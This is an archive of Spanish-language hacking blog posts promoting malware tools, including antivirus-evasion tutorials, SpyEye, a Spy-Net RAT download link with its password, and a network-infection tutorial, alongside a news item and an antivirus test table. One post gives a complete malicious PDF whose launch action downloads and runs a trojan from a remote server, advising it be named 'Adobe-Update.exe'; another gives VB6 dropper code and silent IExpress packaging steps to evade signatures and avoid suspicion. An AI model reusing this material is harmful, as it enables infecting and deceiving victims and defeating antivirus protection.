Mostrando entradas con la etiqueta Malaware Tools. Mostrar todas las entradas
Mostrando entradas con la etiqueta Malaware Tools. Mostrar todas las entradas

13 jun. 2011

Owneando SpyEye!

Otro post a falta de tiempo, este lo encontré muy muy bueno, la imagen es bastante clara, el que la entiende la entiende :D.

Más Info en: http://xylibox.blogspot.com/

14 mar. 2011

[Paper] Indetectando Malwares Cercando Firmas

ANTRAX a publicado en su blog un Tutorial de cómo Indetectabilizar Malwares sacando firmas de antivirus. Lo recomiendo 100% para todos aquellos que gustan del mundo del Malware.

21 nov. 2010

[Video] Cómo funciona SpyEye

SpyEye es el nuevo kit de creación de botnets que está recogiendo el exitoso testigo de Zeus. Se trata de un troyano bancario 2.0 que se vende en los entornos "underground" y que permite a un atacante crear de forma muy sencilla una botnet y recopilar datos sensibles de sus víctimas. En el vídeo se demuestra lo sencillo que sería para un atacante crear este troyano.

[Indetectando Malware] Método FakeProc

Bueno, hace mucho tiempo leyendo en indetectables.net me encontré con un tutorial para Indetectabilizar Malware, decidí subirlo porque nunca está demás... este es un tutorial en PDF donde explican un método para Indetectabilizar un Malware (Virus, Worm, Troyano, Joke, Bot, etc...) modificando el código fuente para confundir a los antivirus con buncles muy extensos. Sin duda anecdótico, pero útil:

16 nov. 2010

[SET] The Social-Engineer Toolkit

The Social-Engineer Toolkit mas conocido como SET, es un conjunto de herramientas especialmente diseñadas para realizar ataques de Ingeniería Social en procesos de auditorias en seguridad, esta programado en Python por David Kennedy (ReL1K), quien hace poco publicó su versión 1.0 con grandes cambios.

27 sept. 2010

[Video] Indetectando Malware by demonio666vip

Bueno... la verdad es un método que tiene mucho tiempo, pero sin duda es muy interesante y fácil de llevar a cabo:




Autor: demonio666vip

23 ago. 2010

Antivirus Certificados

AV-Test.org es uno de los proveedores líder en el mundo en escenarios de prueba, de análisis, de eficacia, del comportamiento y la velocidad de soluciones de seguridad.

Está formado por 17 empleados que tienen más de 15 años de experiencia en el ámbito de la investigación anti-virus y en seguridad de datos.

Ellos han analizado 19 antivirus y aplicaciones de seguridad bajo sus propios estándares de calidad:

  • Protección: Detección dinámica y estática de malwares.
  • Reparación: desinfección del sistema y eliminación de rootkits.
  • Usabilidad: cantidad de veces que las herramientas da falsos positivos alentando sistema. 
  •  
Obteniendo los resultados adjuntos en esta tabla:


Producto

 
Reporte 


Certificado
Puntaje: 0.0 (Peor) a 6.0 (Mejor)
Protección  Reparar Usabilidad
Avast: Internet Security 5.0 102255 si 3.5 4.0 5.0
AVG: Internet Security 9.0 102253 si 5.5 4.0 5.0
Avira: Premium Security Suite 10.0 102247 si 4.0 5.5 4.0
BitDefender: Internet Security Suite 2010 102274 si 4.5 4.0 5.5
BullGuard: Internet Security 9.0 102276 no 3.5 4.0 3.0
Eset: Smart Security 4.0 102214 si 3.5 5.0 5.0
F-Secure: Internet Security 2010 102209 si 5.0 5.0 5.5
G Data: Internet Security 2010/2011 102239 si 5.5 3.5 5.5
Kaspersky: Internet Security 2010 102248 si 5.0 5.5 5.5
McAfee: Internet Security 2010 102260 no 5.0 2.0 3.5
Microsoft: Security Essentials 1.0 102237 si 4.0 4.5 5.5
Norman: Security Suite 8.0 102245 no 2.0 4.5 3.5
Panda: Internet Security 2010 102211 si 5.5 5.5 5.0
PC Tools: Spyware Doctor with AntiVirus 7.0 102202 si 5.0 4.5 3.5
Symantec: Norton Internet Security 2010 102270 si 5.5 5.0 5.5
Trend Micro: Internet Security Pro 2010 102241 no 2.5 4.5 4.5
Webroot: Internet Security Essentials 6.1 102221 si 3.5 4.5 4.0

Aquí ustedes pueden sacar sus propias concluciones, pero sorprende que McAfee no haya logrado la certificación, y destacar los de siempre como Kaspersky y Panda que obtuvieron el mayor puntaje.

[+] Salu2
[+] ZioneR

5 ago. 2010

Lanzan un software para atacar móviles con Android

Dos expertos en seguridad dijeron el viernes que habían puesto en circulación una herramienta para realizar ataques informáticos a smartphones que usen el sistema operativo Android, de Google, para convencer a los fabricantes de que arreglen un fallo que permite que hackers lean el correo electrónico y los mensajes de texto de sus víctimas.

No fue difícil de hacer", dijo Nicholas Percoco, responsable de Spider Labs que junto a un compañero publicó el software, en la conferencia Defcon de hackers el viernes en Las Vegas.

Percoco dijo que llevó unas dos semanas realizar el software malicioso que podría permitir a los criminales robar información importante almacenada en los teléfonos inteligentes que usan Android.

"Hay gente que tiene mucha más motivación que nosotros para hacer estas cosas", agregó.

La herramienta es una de las denominadas rootkit, y permite, una vez instalada, hacerse con el control total de los dispositivos de Android, activados por los usuarios en una media de 160.000 unidades al día, según Google.

"Podríamos estar haciendo lo que quisiéramos y que no hubiese ningún indicio de que estábamos allí", dijo Percoco.

Los ataques de prueba se llevaron a cabo a los teléfonos Legend y Desire de HTC, basados en Android, pero Percoco dijo que creía que podrían dirigirse hacia otros teléfonos de Android.

La herramienta se distribuyó en DVD a los asistentes a la conferencia. Percoco lo explicará a fondo el sábado en una charla.

Google y HTC no estuvieron disponibles para hacer comentarios.

Alrededor de 10.000 hackers y expertos en seguridad asisten a la conferencia de Defcon, la mayor concentración del mundo de este tipo, donde los adictos a la informática se mezclan con los responsables federales de seguridad.

Los asistentes pagan por entrar 140 dólares (unos 107 euros), y no tienen la obligación de dar sus nombres, pero las fuerzas del orden envían agentes de paisano para localizar a criminales, y responsables del gobierno reclutan trabajadores para luchar contra los delitos informáticos y para el Departamento de Defensa.

Los organizadores de la conferencia dicen que los asistentes revelan herramientas como el Rootkit de Percoco para presionar a los fabricantes para que arreglen los errores de sus programas.

18 jun. 2010

Ejecutar *.exe al abrir un PDF

Bueno.. me descargué un video donde explicaban el método y decidí escribir un pequeño tutorial de como hacer que al abrir un PDF se descargué y ejecute un *.exe.

Necesitamos:
  1. Nuestro *.exe (troyano, keylogger, bot, joke, etc...)
  2. Un FTP.
Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato ftp.miftp/server_troyano.exe también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso no sirve ni megaupload, ni rapidshare, etc...

Si no encuentran buenos FTP, dense una vuelta por http://www.free-webhosts.com/webhosting-01.php.

Empecemos:

Bueno... ahora manos a la obra...

Inicio --> ejecutar --> notepad.exe

Pegan este código:
%PDF-1.1

1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj

2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj

3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj

4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources 
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj

5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
ET
endstream
endobj

6 0 obj
[/PDF /Text]
endobj

7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj

8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
 >>
>>
endobj

xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

Aquí lo único que tiene que modificar es:
  /F (http://www.FTP-gratuito.com/server_troyano.exe)
En http://www.FTP-gratuito.com/server_troyano.exe ponen el link de su *.exe previamente subido a un FTP.

Si quieren también pueden modificar esto:
(Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
En Hacking[Blackploit]--> Blackploit.blogspot.com va el texto que aparecerá en el pdf cuando se abra.

Ya modificado todo, guardan el documento como exploit.pdf o como quieran, lo importante es que termine en *.pdf

Resultado:

Al abrir el pdf nos salta una ventana pidiendo que ejecutemos un *.exe.
Recomendanción: que su *.exe se llame Adobe-Update.exe.
Al poner abrir se ejecuta nuestro *.exe.

Para más detalles vean el video de donde saque la información: ExploitPdf.avi
Aquí el exploit: Exploit.pdf

Fuente: http://indetectables.net/

[+] Salu2
[+] ZioneR

28 may. 2010

Saltar las firmas Antivirus: Método D.A.F (Dependencias Anti-Firmas)

Bueno acá les traigo un manual que les explicara paso a paso como saltar las firmas que ponen ciertas compañías Antivirus en las dependencias de los ejecutables, el manual esta reescrito por mi y la fuente es de Indetectables.net en fin... espero que me entiendan y les sirva... saludos.

Vamos hacer un ejecutable portable con la ayuda de Iexpress y un par de aplicaciones nuestras que serán el malware a introducir y un pequeño programa de fácil creación desde cualquier lenguaje de programación, en este caso lo haremos con VB6 que también ha sido testeado con Windows 7.

lo primero que hacemos es crear ese EXE que hará todo nuestro trabajo, abriremos VB y seleccionamos “EXE estandar”.

Haremos doble clic sobre el formulario para que aparezca de tal manera que podamos introducir nuestro código.
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer
As String, ByVal nSize As Long) As Long
Private Sub Form_Initialize()
   Dim FFile As Long
   Dim sysDir As String
   Dim sLen As Long
   Dim Resource() As Byte
   sysDir = Space(260)
   sLen = GetSystemDirectory(sysDir, 260)
   sysDir = Left$(sysDir, sLen)
   On Error Resume Next
   Resource = LoadResData(101, "CUSTOM")
   FFile = FreeFile
   Open sysDir & "\aaaaaaaa.sys" For Binary Shared As #FFile
   Put #FFile, 1, Resource
   Close #FFile
End Sub
Private Sub form_load()
'Se esconde la aplicación
Me.Hide
'Desaparece del Taskmannager
App.TaskVisible = False
'Si ya esta en ejecución salimos, para no tener 2 corriendo a la vez
If App.PrevInstance = True Then: End
End
End Sub

Hacemos Click sobre el menú de complementos y se nos abrirá un desplegable para dirigirnos al “Administrador de complementos”.

Una nueva ventana se abrirá para seleccionar “VB 6 Resource Editor”, tildaremos la pestaña de Cargado y finalmente click en Aceptar.

Si miramos en la parte de arriba de nuestro VB6, veremos una mano blanca sobre lo más parecido a un cubo rubik, hacemos click en él.

Aparecerá la ventana donde podremos agregar de recurso nuestra dependencia al hacer click en el icono marcado en rojo.

En este caso haremos la prueba con la DLL de ejecución más importante que utiliza VB6, modificada anteriormente para que no ocupe tanto en nuestro Malware al final.

Al darle click y sobre Abrir aparecerá el siguiente recuadro en el que veremos a nuestra Dependencias.

Haremos click sobre en el dichoso icono guardado representando un disquete y elegiremos una ruta para guardar nuestro archivo “.RES”.

Una vez guardado automáticamente se añadirá a nuestro proyecto.

Hecha la parte más difícil tan solo nos quedará elegir el nombre con el que queremos que se copie nuestra DLL en sistema, iremos a la parte de código y donde aparece con el nombre elegido por mi para las pruebas de “aaaaaaaa.sys” modificaremos introduciendo el que queremos pero teniendo en cuenta que no podremos superar los caracteres de la dependencia real que después modificaremos desde un editor Hexadecimal.
Open sysDir & "\4n0nym.0us" For Binary Shared As #FFile
 Put #FFile, 1, Resource
 Close #FFile

Como se ve en la imagen modificado:

Ya terminamos nos quedará presionar en “Archivo > Generar Proyecto1.exe

Seleccionaremos la ruta y nombre donde guardar nuestro ejecutable y acabaremos con el Visual Basic

Nos dirigimos a nuestro malware, en este caso elegiremos un simple Notepad encriptado con un encriptador llamado Billar Crypter v2.0 Abrimos nuestro editor hexadecimal “Hex Workshops” e introducimos nuestro ejecutable encriptado y buscamos la dependencia a modificar.

Iremos a la herramienta de reemplazo en la que al encontrarnos con diferente número de caracteres tendremos que rellenar al “4n0nym.0us” (nuevo nombre de dependencia) con ceros a la derecha para que los ignore el código y todo funcione.

Al presionar sobre Aceptar saltará la siguiente ventana con la que modificaremos todas a la vez.

Con esto acabaremos de cargarnos el ejecutable si no le incorporamos nuestra dependencia de VB.

Si al ejecutar nuestro EXE sale este error todo funciona bien por ahora.

Iremos a “Inicio > Ejecutar > Iexpress” y empezaremos a juntar nuestros dos ejecutables para finalizar con el salteo de firmas en dependencias.

Sigan las instrucciones aunque el uso de esta herramienta es de lo más simple que hicieron nuestros amigos de Mocosoft.XD

Elegimos un nombre para el título de nuestro paquete de aplicaciones.

Seleccionamos la opción de “No prompt” y presionamos “Siguiente”.

Elegimos esta opción que aparece más abajo para que no muestre el display de licencia.

Presionando en el botón “Add”, buscaremos nuestros dos archivos.

En este paso seleccionamos el orden de ejecución de dichas aplicaciones, en primer lugar la “Dependencia.exe” para evitar el posible error de no encontrar la nueva “4n0nym.0us” y en el comando seleccionaremos nuestro ejecutable modificado.

Dependiendo del malware que se va a utilizar, configuren esta opción como prefieran si desean hacerlo todo de forma oculta o en mi caso queremos ver que el Notepad se ejecuta.

Seleccionamos esta opción para que no muestre ningún mensaje al finalizar las descompresiones.

Ocultamos las animaciones de extracción para que el usuario no vea nada extraño en la ejecución del archivo.

Seleccionamos la opción de no reiniciar la máquina para evitar sospechas.

En este caso elijan la que ustedes decidan pero a mi no me apetece guardar la directiva.

Presionamos siguiente y seguidamente aparecerá la ruta donde deseamos guardar nuestro ejecutable final.

Y finalizando presionamos en el botón marcado en rojo para acabar con todo el proceso.

Solo nos queda hacer la prueba y observar si ciertamente funciona, para eso vamos a la carpeta donde guardado nuestro ejecutable y por curiosidad abramos la ruta de “%Windir%/system32” para observar como automáticamente se agrega la dependencia al sistema y después se ejecuta nuestro “malware” en este caso un Notepad con lado oscuro XD.

Ejemplo sobre WXP SP2 32bits:

Ejemplo sobre W7 Ultimate 64bits:

Espero que les ayude en algo XD les mando saludos.

Descargar Método D.A.F. en PDF

Autor: 4nonym0u
Fuente: http://reactos.diosdelared.com/

23 oct. 2009

Spy-Net [RAT] v2.6


Algunos cambios se realizó en esta nueva versión. Aquí:
  • Se ha corregido el error en la opción Buscar en el archivo de gestor de ficheros.
    Aumento de la velocidad en la lista de administrador de archivos y unidades de la lista.
  • Corregido un error en Regedit que causan algunos fallos de la parte del servidor.
  • Corregido un error en las opciones de puertos de cambio. Cuando el puerto seleccionado está en uso causar algunos accidentes en el cliente. Ahora que está bien.
  •  El cambio de escritorio y funciones de la cámara web. Ahora, cuando la ventana está abierta, al inicio captura automaticamente.
  • Mejor recuperación de las contraseñas.
  • Se quitó milisegundos de  Idle/Ping en la lista principal.
  • Se Añadió en la barra de progreso la búsqueda de contraseñas. Ahora, usted puede ver, cuando algún servidor busca una contraseña.
  • Ahora, el cliente puede recordar la última configuración en el escritorio y Webcam. El usuario no tiene que cambiar cada vez que entra.
  • Mayor transferencia de datos. Esta función de provoca un pequeño aumento en el tamaño del server.
  • Primera fecha de ejecución ha sido añadido de nuevo.
Descargar y ayuda en: http://hackhound.org/forum/

Descarga Directa: http://www.4shared.com/file/141956665/99a1fc2/Spt-Net_RAT_v26.html
Password: Spy-Net

Aquí un video tambien del Spy-Net [RAT] v2.6: http://www.4shared.com/file/142000732/10278fea/SpyNetVideo.html

Fuente: http://spynetrat.blogspot.com/

5 sept. 2009

[Tutotial] Infectar por Red Wi-fi y/o LAN

Buen Tutorial de como infectar con un malaware (troyano, back.door, etc) una red lan o una red wi-fi...

Descarga (Directa)
Descarga MEGAUPLOAD
Descarga RapidShare

Fuente: http://www.indetectables.net/foro/
Autor: ANTRAX